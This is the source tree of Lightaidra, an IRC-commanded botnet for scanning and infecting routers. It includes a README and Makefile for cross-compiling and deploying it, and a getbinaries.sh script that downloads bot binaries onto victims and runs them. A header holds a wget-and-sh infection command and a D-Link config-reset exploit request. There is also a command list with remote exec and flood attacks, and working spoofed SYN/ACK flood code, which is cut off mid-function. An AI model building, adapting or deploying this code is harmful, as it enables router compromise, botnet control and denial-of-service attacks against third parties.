├── Makefile ├── README.md ├── docs ├── CHANGELOG ├── HELP └── LICENSE ├── getbinaries.sh ├── include ├── attacks.h ├── config.h ├── headers.h ├── irc.h ├── main.h ├── requests.h ├── scan.h └── utils.h └── source ├── attacks.c ├── hide.c ├── irc.c ├── main.c ├── requests.c ├── scan.c └── utils.c /Makefile: -------------------------------------------------------------------------------- 1 | # Makefile - Lightaidra version 0x2012 2 | # Copyright (C) 2008-2015 Federico Fazzi, . 3 | # 4 | # LEGAL DISCLAIMER: It is the end user's responsibility to obey 5 | # all applicable local, state and federal laws. Developers assume 6 | # no liability and are not responsible for any misuse or damage 7 | # caused by this program. 8 | 9 | CFLAGS=-lpthread -pthread 10 | x86_32cc=/usr/bin/gcc -m32 11 | x86_64cc=/usr/bin/gcc -m64 -O2 12 | mipsel_cc=./bin/cross-compiler-mipsel/bin/mipsel-gcc 13 | mips_cc=./bin/cross-compiler-mips/bin/mips-gcc 14 | superh_cc=./bin/cross-compiler-sh4/bin/sh4-gcc 15 | arm_cc=./bin/cross-compiler-armv5l/bin/armv5l-gcc 16 | ppc_cc=./bin/cross-compiler-powerpc/bin/powerpc-gcc 17 | 18 | # NAME OF BINARIES: 19 | x86_32bin=bin/x86_32 20 | x86_64bin=bin/x86_64 21 | mipsel_bin=bin/mipsel 22 | mips_bin=bin/mips 23 | superh_bin=bin/sh 24 | arm_bin=bin/arm 25 | ppc_bin=bin/ppc 26 | hide_bin=bin/hide 27 | 28 | hide32 : source/hide.c 29 | ${x86_32cc} -o ${hide_bin} source/hide.c 30 | hide64 : source/hide.c 31 | ${x86_64cc} -o ${hide_bin} source/hide.c 32 | 33 | x86_32 : source/main.c source/utils.c source/irc.c source/requests.c source/scan.c source/attacks.c 34 | ${x86_32cc} ${CFLAGS} -o ${x86_32bin} source/main.c source/utils.c \ 35 | source/irc.c source/requests.c source/scan.c source/attacks.c 36 | 37 | x86_64 : source/main.c source/utils.c source/irc.c source/requests.c source/scan.c source/attacks.c 38 | ${x86_64cc} ${CFLAGS} -o ${x86_64bin} source/main.c source/utils.c \ 39 | source/irc.c source/requests.c source/scan.c source/attacks.c 40 | 41 | mipsel : source/main.c source/utils.c source/irc.c source/requests.c source/scan.c source/attacks.c 42 | ${mipsel_cc} -static ${CFLAGS} -DMIPSEL -o ${mipsel_bin} source/main.c source/utils.c \ 43 | source/irc.c source/requests.c source/scan.c source/attacks.c 44 | 45 | mips : source/main.c source/utils.c source/irc.c source/requests.c source/scan.c source/attacks.c 46 | ${mips_cc} -static ${CFLAGS} -DMIPS -o ${mips_bin} source/main.c source/utils.c \ 47 | source/irc.c source/requests.c source/scan.c source/attacks.c 48 | 49 | superh : source/main.c source/utils.c source/irc.c source/requests.c source/scan.c source/attacks.c 50 | ${superh_cc} -static ${CFLAGS} -DSUPERH -o ${superh_bin} source/main.c source/utils.c \ 51 | source/irc.c source/requests.c source/scan.c source/attacks.c 52 | 53 | arm : source/main.c source/utils.c source/irc.c source/requests.c source/scan.c source/attacks.c 54 | ${arm_cc} -static ${CFLAGS} -DARM -o ${arm_bin} source/main.c source/utils.c \ 55 | source/irc.c source/requests.c source/scan.c source/attacks.c 56 | 57 | ppc : source/main.c source/utils.c source/irc.c source/requests.c source/scan.c source/attacks.c 58 | ${ppc_cc} -static ${CFLAGS} -DPPC -o ${ppc_bin} source/main.c source/utils.c \ 59 | source/irc.c source/requests.c source/scan.c source/attacks.c 60 | 61 | clean : 62 | rm -fr source/*.o 63 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Lightaidra 2 | ========== 3 | 4 | Legal Disclaimer 5 | ---------------- 6 | 7 | It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume 8 | no liability and are not responsible for any misuse or damage caused by this program. 9 | 10 | Description 11 | ------------ 12 | 13 | Lightaidra is a mass-tool commanded by irc that allows scanning and exploiting routers 14 | for make BOTNET (in rx-bot style), in addition to this, with aidra you can perform 15 | some attacks with tcp flood. 16 | 17 | Configuration 18 | ------------- 19 | 20 | The installation is just a little complicated, but not hard! 21 | 22 | ```bash 23 | deftcode ~ $ tar zxvf lightaidra* 24 | deftcode ~ $ cd lightaidra* 25 | ``` 26 | 27 | If cross compilers are not included in **bin/** directory you will need 28 | to download these cross-compilers and extract them into **lightaidra/bin/** 29 | 30 | http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2 31 | http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 32 | http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 33 | http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 34 | http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 35 | 36 | Config.h 37 | -------- 38 | 39 | 40 | **IMPORTANT:** `REFERENCE_HTTP` in **include/config.h** must be the server where you upload the binaries (mipsel, mips, arm, ppc, sh4) and **getbinaries.sh**. 41 | If you change the `name of binaries` you must update the **Makefile** and **getbinaries.sh** too. 42 | 43 | ```bash 44 | deftcode ~ $ vi include/config.h 45 | ``` 46 | 47 | Build binaries 48 | -------------- 49 | 50 | ```bash 51 | deftcode ~ $ make x86_32 (for 32bit) 52 | deftcode ~ $ make x86_64 (for 64bit) 53 | deftcode ~ # ./bin/x86_64 54 | ``` 55 | 56 | Build binaries for MIPSEL, MIPS, ARM, PPC, SUPERH 57 | 58 | ```bash 59 | deftcode ~ $ make mipsel mips arm ppc superh 60 | ``` 61 | 62 | Now start your httpd and upload the binaries and getbinaries.sh 63 | Now go to IRC server and command your bot. 64 | 65 | BUGS 66 | ---- 67 | 68 | If you find bugs (which is quite likely), please submit them to 69 | with specific information, such as your command-line, the nature of the bug and other. 70 | -------------------------------------------------------------------------------- /docs/CHANGELOG: -------------------------------------------------------------------------------- 1 | Lightaidra version 0x2012 (Released 29-1-2012) 2 | 3 | * added more router architettures (mips, ppc, superh, arm), 4 | with getbinaries.sh for fast download. 5 | * added function to store local pid in /var/run (for no clones). 6 | * replaced get_local_ip() with new getextip(), 7 | using automation.whatismyip.com. 8 | * added set up ip spoofing. 9 | * adapted .synflood, .ngsynflood, .ackflood, .ngackflood, 10 | from ktx with selected ddos. 11 | * added .setchan function to set new master channel. 12 | * added multiple irc server and port connection, 13 | with encrypt/decrypt features. 14 | * fixed various requests/scanner bugs. 15 | * removed easystart.sh for inutility. 16 | 17 | -------------------------------------------------------------------------------- /docs/HELP: -------------------------------------------------------------------------------- 1 | 2 | * *** Access Commands: 3 | * 4 | * .login - login to bot's party-line 5 | * .logout - logout from bot's party-line 6 | * 7 | * *** Miscs Commands 8 | * 9 | * .exec - execute a system command 10 | * .version - show the current version of bot 11 | * .status - show the status of bot 12 | * .help - show this help message 13 | * 14 | * *** Scan Commands 15 | * 16 | * .advscan - scan with user:pass (A.B) classes sets by you 17 | * .advscan - scan with d-link config reset bug 18 | * .advscan->recursive - scan local ip range with user:pass, (C.D) classes random 19 | * .advscan->recursive - scan local ip range with d-link config reset bug 20 | * .advscan->random - scan random ip range with user:pass, (A.B) classes random 21 | * .advscan->random - scan random ip range with d-link config reset bug 22 | * .advscan->random->b - scan local ip range with user:pass, A.(B) class random 23 | * .advscan->random->b - scan local ip range with d-link config reset bug 24 | * .stop - stop current operation (scan/dos) 25 | * 26 | * *** DDos Commands: 27 | * NOTE: to 0 = random ports, to 0 = random spoofing, 28 | * use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs 29 | * where: *=syn,ngsyn,ack,nsack m=mipsel a=arm p=ppc s=superh x=x86 30 | * 31 | * .spoof - set the source address ip spoof 32 | * .synflood - tcp syn flooder 33 | * .ngsynflood - tcp ngsyn flooder (new generation) 34 | * .ackflood - tcp ack flooder 35 | * .ngackflood - tcp ngack flooder (new generation) 36 | * 37 | * *** IRC Commands: 38 | * 39 | * .setchan - set new master channel 40 | * .join - join bot in selected room 41 | * .part - part bot from selected room 42 | * .quit - kill the current process 43 | * 44 | * *** EOF 45 | 46 | -------------------------------------------------------------------------------- /docs/LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2008-2015 Federico Fazzi 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /getbinaries.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER. 3 | # UPLOAD GETBINARIES.SH IN YOUR HTTPD. 4 | # 5 | # LEGAL DISCLAIMER: It is the end user's responsibility to obey 6 | # all applicable local, state and federal laws. Developers assume 7 | # no liability and are not responsible for any misuse or damage 8 | # caused by this program. 9 | 10 | # YOUR HTTPD SERVER: 11 | REFERENCE_HTTP="http://127.0.0.1" 12 | 13 | # NAME OF BINARIES: 14 | REFERENCE_MIPSEL="mipsel" 15 | REFERENCE_MIPS="mips" 16 | REFERENCE_SUPERH="sh" 17 | REFERENCE_ARM="arm" 18 | REFERENCE_PPC="ppc" 19 | 20 | rm -fr /var/run/${REFERENCE_MIPSEL} \ 21 | /var/run/${REFERENCE_MIPS} \ 22 | /var/run/${REFERENCE_SUPERH} \ 23 | /var/run/${REFERENCE_ARM} \ 24 | /var/run/${REFERENCE_PPC} 25 | 26 | wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run && chmod +x /var/run/${REFERENCE_MIPSEL} && /var/run/${REFERENCE_MIPSEL} 27 | wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && chmod +x /var/run/${REFERENCE_MIPS} && /var/run/${REFERENCE_MIPS} 28 | wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && chmod +x /var/run/${REFERENCE_ARM} && /var/run/${REFERENCE_ARM} 29 | wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && chmod +x /var/run/${REFERENCE_PPC} && /var/run/${REFERENCE_PPC} 30 | wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && chmod +x /var/run/${REFERENCE_SUPERH} && /var/run/${REFERENCE_SUPERH} 31 | 32 | sleep 3; 33 | rm -fr /var/run/getbinaries.sh 34 | -------------------------------------------------------------------------------- /include/attacks.h: -------------------------------------------------------------------------------- 1 | #ifndef __ATTACKS_H_ 2 | #define __ATTACKS_H_ 3 | 4 | unsigned long srchost; 5 | unsigned int dsthost; 6 | unsigned short uport; 7 | unsigned int useconds; 8 | 9 | struct send_tcp { 10 | struct iphdr ip; 11 | struct tcphdr tcp; 12 | char buf[20]; 13 | }; 14 | 15 | struct pseudo_header { 16 | unsigned int source_address; 17 | unsigned int dest_address; 18 | unsigned char placeholder; 19 | unsigned char protocol; 20 | unsigned short tcp_length; 21 | struct tcphdr tcp; 22 | char buf[20]; 23 | }; 24 | 25 | #endif 26 | -------------------------------------------------------------------------------- /include/config.h: -------------------------------------------------------------------------------- 1 | #ifndef __CONFIG_H_ 2 | #define __CONFIG_H_ 3 | 4 | /* BACKGROUND MODE '0', DEBUG MODE '1' (JUST FOR DEVELOPERS) */ 5 | #define background_mode 0 6 | 7 | /* IRC SERVER SYNTAX: IP:PORT */ 8 | /* OR IP:PORT|IP:PORT|IP:PORT ETC.. TO ADD MORE (MAX 10) */ 9 | /* WARNING: DON'T CHANGE PASSPROTO VALUE IF YOU DON'T */ 10 | /* HAVE AN MODDED PROTOCOL IRCD!!! */ 11 | #define irc_servers "127.0.0.1:6666|127.0.0.2:6667" 12 | #define passproto "PASS" 13 | #define irc_passwd "fuckya" 14 | /* IRC SERVER ENCRYPTED 0=IRC_SERVERS 1=ENC_SERVERS */ 15 | /* USE HIDE.C TO CREATE YOUR CRYPTED SERVER LIST */ 16 | #define encirc 0 17 | #define enc_servers ">.,C_>C>,C@<@U+<<.,C_>C>,C@<>U+<<.,C_>C>,C@<.,C_>C>,C@<_U+<<<" 18 | #define enc_passwd "bcdi" 19 | 20 | /* CHANNEL NAME */ 21 | #define irc_chan "#chan" 22 | /* ENABLE FULL MESSAGES, '0'=OFF '1'=ON */ 23 | /* NOTE: THAT PRODUCE MORE LAG! */ 24 | #define all_messages 0 25 | /* CHANNEL KEY */ 26 | #define irc_chankey "key" 27 | 28 | /* MASTER HOSTNAME WILL BE ABLE TO PERFORM AUTHENTICATION */ 29 | #define master_host "@hostname.tld" 30 | /* MASTER PASSWORD AUTHENTICATION (BOT PARTYLINE) */ 31 | #define master_password "pwn" 32 | 33 | /* HTTP REFERENCE (WHERE YOU UPLOAD BINARIES AND GETBINARIES.SH) */ 34 | #define reference_http "http://127.0.0.1" 35 | 36 | /* NAME OF BINARIES: IF YOU CHANGE THESE VALUES, DON'T FORGET */ 37 | /* TO CHANGE TOO IN MAKEFILE AND GETBINARIES.SH */ 38 | #define reference_mipsel "mipsel" 39 | #define reference_mips "mips" 40 | #define reference_superh "sh" 41 | #define reference_arm "arm" 42 | #define reference_ppc "ppc" 43 | 44 | /* NICKNAME PREFIX: */ 45 | /* WARNING: DO NOT CHANGE NCTYPE VALUE! */ 46 | /* NOTE: MAXTHREADS ARE FOR SCANNER, */ 47 | /* DON'T CHANGE IF YOU DON'T KNOW WHAT */ 48 | /* YOU ARE DOING! */ 49 | #ifdef MIPSEL 50 | #define irc_nick_prefix "[MS]" 51 | #define nctype "m" 52 | #define maxthreads (128) 53 | #elif MIPS 54 | #define irc_nick_prefix "[M]" 55 | #define nctype "m" 56 | #define maxthreads (128) 57 | #elif SUPERH 58 | #define irc_nick_prefix "[S]" 59 | #define nctype "s" 60 | #define maxthreads (128) 61 | #elif ARM 62 | #define irc_nick_prefix "[A]" 63 | #define nctype "a" 64 | #define maxthreads (128) 65 | #elif PPC 66 | #define irc_nick_prefix "[P]" 67 | #define nctype "p" 68 | #define maxthreads (128) 69 | #else 70 | #define irc_nick_prefix "[X]" 71 | #define nctype "x" 72 | #define maxthreads (128) 73 | #endif 74 | 75 | #endif 76 | -------------------------------------------------------------------------------- /include/headers.h: -------------------------------------------------------------------------------- 1 | #ifndef __HEADERS_H_ 2 | #define __HEADERS_H_ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | #include "main.h" 24 | #include "config.h" 25 | #include "utils.h" 26 | #include "irc.h" 27 | #include "requests.h" 28 | #include "scan.h" 29 | #include "attacks.h" 30 | 31 | #undef EXIT_FAILURE 32 | #define EXIT_FAILURE -1 33 | 34 | #endif 35 | -------------------------------------------------------------------------------- /include/irc.h: -------------------------------------------------------------------------------- 1 | #ifndef __IRC_H_ 2 | #define __IRC_H_ 3 | 4 | #define static_rcv 32 5 | 6 | typedef struct { 7 | int sockfd; 8 | struct hostent *sockhs; 9 | struct sockaddr_in sockadr; 10 | 11 | } sock_t; 12 | 13 | typedef struct { 14 | char rcv_a[128]; 15 | char rcv_b[static_rcv]; 16 | char rcv_c[static_rcv]; 17 | char rcv_sa[static_rcv]; 18 | char rcv_sb[static_rcv]; 19 | char rcv_sc[static_rcv]; 20 | char rcv_sd[static_rcv]; 21 | char rcv_se[static_rcv]; 22 | } requests_t; 23 | 24 | int max_pids, pid_status; 25 | unsigned int recv_bytes; 26 | 27 | char *data_ptr, channel[32]; 28 | char netbuf[sizebuf]; 29 | 30 | #endif 31 | -------------------------------------------------------------------------------- /include/main.h: -------------------------------------------------------------------------------- 1 | #ifndef __MAIN_H_ 2 | #define __MAIN_H_ 3 | 4 | #define true (0) 5 | #define false (-1) 6 | 7 | #define result_file "/var/run/.lightscan" 8 | #define pidfile "/var/run/.lightpid" 9 | 10 | #define sizebuf 2048 11 | 12 | unsigned short counter, total; 13 | char *isrv[10]; 14 | 15 | #endif 16 | -------------------------------------------------------------------------------- /include/requests.h: -------------------------------------------------------------------------------- 1 | #ifndef __REQUESTS_H_ 2 | #define __REQUESTS_H_ 3 | 4 | int login_status, stop; 5 | int random_ct, random_num; 6 | char *token, status_temp[128], nt[3]; 7 | 8 | #endif 9 | -------------------------------------------------------------------------------- /include/scan.h: -------------------------------------------------------------------------------- 1 | #ifndef __SCAN_H 2 | #define __SCAN_H 3 | 4 | #define telnet_port (23) 5 | #define http_port (80) 6 | 7 | #define maxhosts (65535) 8 | 9 | typedef struct { 10 | char hostname[32]; 11 | } scan_data_t; 12 | 13 | FILE *resfd, *statfd; 14 | char resbuf[21], restag[21]; 15 | char hosts[maxhosts][16]; 16 | 17 | unsigned short total, founds; 18 | char psw_x[32], psw_y[32]; 19 | char __netbuf[sizebuf]; 20 | 21 | struct timeval tm; 22 | int timeout_value; 23 | 24 | sock_t *scan_sp; 25 | pid_t pid, g_pid; 26 | 27 | #define getbinaries "rm -rf /var/run/getbinaries.sh; wget -c %s/getbinaries.sh -P /var/run && sh /var/run/getbinaries.sh&\n" 28 | 29 | /* CONFIG RESET BUG: POST request. */ 30 | #define post_request "POST /cgi-bin/firmwarecfg HTTP/1.1\r\n" \ 31 | "Host: $IP\r\n" \ 32 | "User-Agent: veryprivateacsor\r\n" \ 33 | "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n" \ 34 | "Accept-Language: en-us,en;q=0.5\r\n" \ 35 | "Accept-Encoding: gzip,deflate\r\n" \ 36 | "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" \ 37 | "Keep-Alive: 300\r\n" \ 38 | "Connection: keep-alive\r\n" \ 39 | "Content-Type: multipart/form-data; \r\n" \ 40 | "boundary=---------------------------41184676334\r\n" \ 41 | "Content-Length: 234\r\n" \ 42 | "\r\n" \ 43 | "-----------------------------41184676334\r\n" \ 44 | "Content-Disposition: form-data; name=\"config.x\"\r\n" \ 45 | "\r\n" \ 46 | "\r\n" \ 47 | "-----------------------------41184676334\r\n" \ 48 | "Content-Disposition: form-data; name=\"config.y\"\r\n" \ 49 | "\r\n" \ 50 | "\r\n" \ 51 | "-----------------------------41184676334--\r\n" 52 | 53 | #endif 54 | -------------------------------------------------------------------------------- /include/utils.h: -------------------------------------------------------------------------------- 1 | #ifndef __UTILS_H_ 2 | #define __UTILS_H_ 3 | 4 | #define IPREQUEST "GET /index.html HTTP/1.0\nHost: icanhazip.comn\n" 5 | 6 | #ifdef MIPSEL 7 | #define ipreq "64.182.208.183" 8 | #elif MIPS 9 | #define ipreq "104.238.136.31" 10 | #elif SUPERH 11 | #define ipreq "104.238.141.75" 12 | #elif ARM 13 | #define ipreq "104.238.141.75" 14 | #elif PPC 15 | #define ipreq "104.238.136.31" 16 | #else 17 | #define ipreq "104.238.141.75" 18 | #endif 19 | 20 | char decodedsrv[512], decodedpsw[32]; 21 | pid_t daemonize_pid; 22 | 23 | #endif 24 | -------------------------------------------------------------------------------- /source/attacks.c: -------------------------------------------------------------------------------- 1 | /* 2 | * attacks.c - USE LIGHTAIDRA AT YOUR OWN RISK! 3 | * 4 | * Lightaidra - IRC-based mass router scanner/exploiter. 5 | * Copyright (C) 2008-2015 Federico Fazzi, . 6 | * 7 | * LEGAL DISCLAIMER: It is the end user's responsibility to obey 8 | * all applicable local, state and federal laws. Developers assume 9 | * no liability and are not responsible for any misuse or damage 10 | * caused by this program. 11 | * 12 | */ 13 | 14 | #include "../include/headers.h" 15 | 16 | unsigned int get_spoofed(); 17 | unsigned short in_cksum(unsigned short *ptr, int nbytes); 18 | int sockwrite(int sd, const char *fmt, ...); 19 | 20 | 21 | /* synflood(), ngsynflood(), ackflood(), ngackflood() */ 22 | /* these functions are adapted from ktx.c */ 23 | void synflood(sock_t * sp, unsigned int dest_addr, unsigned short dest_port, int ntime) { 24 | int get; 25 | struct send_tcp send_tcp; 26 | struct pseudo_header pseudo_header; 27 | struct sockaddr_in sin; 28 | unsigned int syn[20] = { 2, 4, 5, 180, 4, 2, 8, 10, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 0 }, a = 0; 29 | unsigned int psize = 20, source, dest, check; 30 | unsigned long saddr, daddr, secs; 31 | time_t start = time(NULL); 32 | 33 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) 34 | exit(EXIT_FAILURE); { 35 | int i; 36 | 37 | for (i = 0; i < 20; i++) { 38 | send_tcp.buf[i] = (u_char) syn[i]; 39 | } 40 | } 41 | 42 | daddr = dest_addr; 43 | secs = ntime; 44 | 45 | send_tcp.ip.ihl = 5; 46 | send_tcp.ip.version = 4; 47 | send_tcp.ip.tos = 16; 48 | send_tcp.ip.frag_off = 64; 49 | send_tcp.ip.ttl = 64; 50 | send_tcp.ip.protocol = 6; 51 | send_tcp.tcp.ack_seq = 0; 52 | send_tcp.tcp.doff = 10; 53 | send_tcp.tcp.res1 = 0; 54 | send_tcp.tcp.cwr = 0; 55 | send_tcp.tcp.ece = 0; 56 | send_tcp.tcp.urg = 0; 57 | send_tcp.tcp.ack = 0; 58 | send_tcp.tcp.psh = 0; 59 | send_tcp.tcp.rst = 0; 60 | send_tcp.tcp.fin = 0; 61 | send_tcp.tcp.syn = 1; 62 | send_tcp.tcp.window = 30845; 63 | send_tcp.tcp.urg_ptr = 0; 64 | dest = htons(dest_port); 65 | 66 | while (1) { 67 | source = rand(); 68 | if (dest_port == 0) dest = rand(); 69 | 70 | if (srchost == 0) saddr = get_spoofed(); 71 | else saddr = srchost; 72 | 73 | send_tcp.ip.tot_len = htons(40 + psize); 74 | send_tcp.ip.id = rand(); 75 | send_tcp.ip.saddr = saddr; 76 | send_tcp.ip.daddr = daddr; 77 | send_tcp.ip.check = 0; 78 | send_tcp.tcp.source = source; 79 | send_tcp.tcp.dest = dest; 80 | send_tcp.tcp.seq = rand(); 81 | send_tcp.tcp.check = 0; 82 | sin.sin_family = AF_INET; 83 | sin.sin_port = dest; 84 | sin.sin_addr.s_addr = send_tcp.ip.daddr; 85 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); 86 | check = rand(); 87 | send_tcp.buf[9] = ((char *)&check)[0]; 88 | send_tcp.buf[10] = ((char *)&check)[1]; 89 | send_tcp.buf[11] = ((char *)&check)[2]; 90 | send_tcp.buf[12] = ((char *)&check)[3]; 91 | pseudo_header.source_address = send_tcp.ip.saddr; 92 | pseudo_header.dest_address = send_tcp.ip.daddr; 93 | pseudo_header.placeholder = 0; 94 | pseudo_header.protocol = IPPROTO_TCP; 95 | pseudo_header.tcp_length = htons(20 + psize); 96 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); 97 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); 98 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32 + psize); 99 | sendto(get, &send_tcp, 40 + psize, 0, (struct sockaddr *)&sin, sizeof(sin)); 100 | 101 | if (a >= 50) { 102 | if (time(NULL) >= start + secs) { 103 | sockwrite(sp->sockfd, "PRIVMSG %s :[nsynflood] packeting completed!\n", channel); 104 | close(get); 105 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 106 | exit(EXIT_SUCCESS); 107 | } 108 | 109 | a = 0; 110 | } 111 | 112 | a++; 113 | } 114 | 115 | close(get); 116 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 117 | exit(EXIT_FAILURE); 118 | } 119 | 120 | void ngsynflood(sock_t * sp, unsigned int dest_addr, unsigned short dest_port, int ntime) { 121 | int get; 122 | struct send_tcp send_tcp; 123 | struct pseudo_header pseudo_header; 124 | struct sockaddr_in sin; 125 | unsigned int syn[20] = { 2, 4, 5, 180, 4, 2, 8, 10, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 0 }, a = 0; 126 | unsigned int psize = 20, source, dest, check; 127 | unsigned long saddr, daddr, secs; 128 | time_t start = time(NULL); 129 | 130 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) 131 | exit(EXIT_FAILURE); { 132 | int i; 133 | 134 | for (i = 0; i < 20; i++) { 135 | send_tcp.buf[i] = (u_char) syn[i]; 136 | } 137 | } 138 | 139 | daddr = dest_addr; 140 | secs = ntime; 141 | 142 | send_tcp.ip.ihl = 5; 143 | send_tcp.ip.version = 4; 144 | send_tcp.ip.tos = 16; 145 | send_tcp.ip.frag_off = 64; 146 | send_tcp.ip.ttl = 64; 147 | send_tcp.ip.protocol = 6; 148 | send_tcp.tcp.ack_seq = 0; 149 | send_tcp.tcp.doff = 10; 150 | send_tcp.tcp.res1 = 0; 151 | send_tcp.tcp.cwr = 0; 152 | send_tcp.tcp.ece = 0; 153 | send_tcp.tcp.urg = 0; 154 | send_tcp.tcp.ack = 0; 155 | send_tcp.tcp.psh = 0; 156 | send_tcp.tcp.rst = 0; 157 | send_tcp.tcp.fin = 0; 158 | send_tcp.tcp.syn = 1; 159 | send_tcp.tcp.window = 30845; 160 | send_tcp.tcp.urg_ptr = 0; 161 | dest = htons(dest_port); 162 | 163 | while (1) { 164 | source = rand(); 165 | if (dest_port == 0) dest = rand(); 166 | 167 | if (srchost == 0) saddr = get_spoofed(); 168 | else saddr = srchost; 169 | 170 | send_tcp.ip.tot_len = htons(40 + psize); 171 | send_tcp.ip.id = rand(); 172 | send_tcp.ip.saddr = saddr; 173 | send_tcp.ip.daddr = daddr; 174 | send_tcp.ip.check = 0; 175 | send_tcp.tcp.source = source; 176 | send_tcp.tcp.dest = dest; 177 | send_tcp.tcp.seq = rand(); 178 | send_tcp.tcp.check = 0; 179 | sin.sin_family = AF_INET; 180 | sin.sin_port = dest; 181 | sin.sin_addr.s_addr = send_tcp.ip.daddr; 182 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); 183 | check = rand(); 184 | send_tcp.buf[9] = ((char *)&check)[0]; 185 | send_tcp.buf[10] = ((char *)&check)[1]; 186 | send_tcp.buf[11] = ((char *)&check)[2]; 187 | send_tcp.buf[12] = ((char *)&check)[3]; 188 | pseudo_header.source_address = send_tcp.ip.saddr; 189 | pseudo_header.dest_address = send_tcp.ip.daddr; 190 | pseudo_header.placeholder = 0; 191 | pseudo_header.protocol = IPPROTO_TCP; 192 | pseudo_header.tcp_length = htons(20 + psize); 193 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); 194 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); 195 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32 + psize); 196 | sendto(get, &send_tcp, 40 + psize, 0, (struct sockaddr *)&sin, sizeof(sin)); 197 | 198 | if (a >= 50) { 199 | if (time(NULL) >= start + secs) { 200 | sockwrite(sp->sockfd, "PRIVMSG %s :[ngsynflood] packeting completed!\n", channel); 201 | close(get); 202 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 203 | exit(EXIT_SUCCESS); 204 | } 205 | 206 | a = 0; 207 | } 208 | 209 | a++; 210 | } 211 | 212 | close(get); 213 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 214 | exit(EXIT_FAILURE); 215 | } 216 | 217 | void ackflood(sock_t * sp, unsigned int dest_addr, unsigned short dest_port, int ntime) { 218 | int get; 219 | struct send_tcp send_tcp; 220 | struct pseudo_header pseudo_header; 221 | struct sockaddr_in sin; 222 | unsigned int syn[20] = { 2, 4, 5, 180, 4, 2, 8, 10, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 0 }, a = 0; 223 | unsigned int psize = 20, source, dest, check; 224 | unsigned long saddr, daddr, secs; 225 | time_t start = time(NULL); 226 | 227 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) 228 | exit(EXIT_FAILURE); { 229 | int i; 230 | for (i = 0; i < 20; i++) 231 | send_tcp.buf[i] = (u_char) syn[i]; 232 | } 233 | 234 | daddr = dest_addr; 235 | secs = ntime; 236 | dest = htons(dest_port); 237 | 238 | send_tcp.ip.ihl = 5; 239 | send_tcp.ip.version = 4; 240 | send_tcp.ip.tos = 16; 241 | send_tcp.ip.frag_off = 64; 242 | send_tcp.ip.ttl = 255; 243 | send_tcp.ip.protocol = 6; 244 | send_tcp.tcp.doff = 5; 245 | send_tcp.tcp.res1 = 0; 246 | send_tcp.tcp.cwr = 0; 247 | send_tcp.tcp.ece = 0; 248 | send_tcp.tcp.urg = 0; 249 | send_tcp.tcp.ack = 1; 250 | send_tcp.tcp.psh = 1; 251 | send_tcp.tcp.rst = 0; 252 | send_tcp.tcp.fin = 0; 253 | send_tcp.tcp.syn = 0; 254 | send_tcp.tcp.window = 30845; 255 | send_tcp.tcp.urg_ptr = 0; 256 | 257 | while (1) { 258 | if (dest_port == 0) 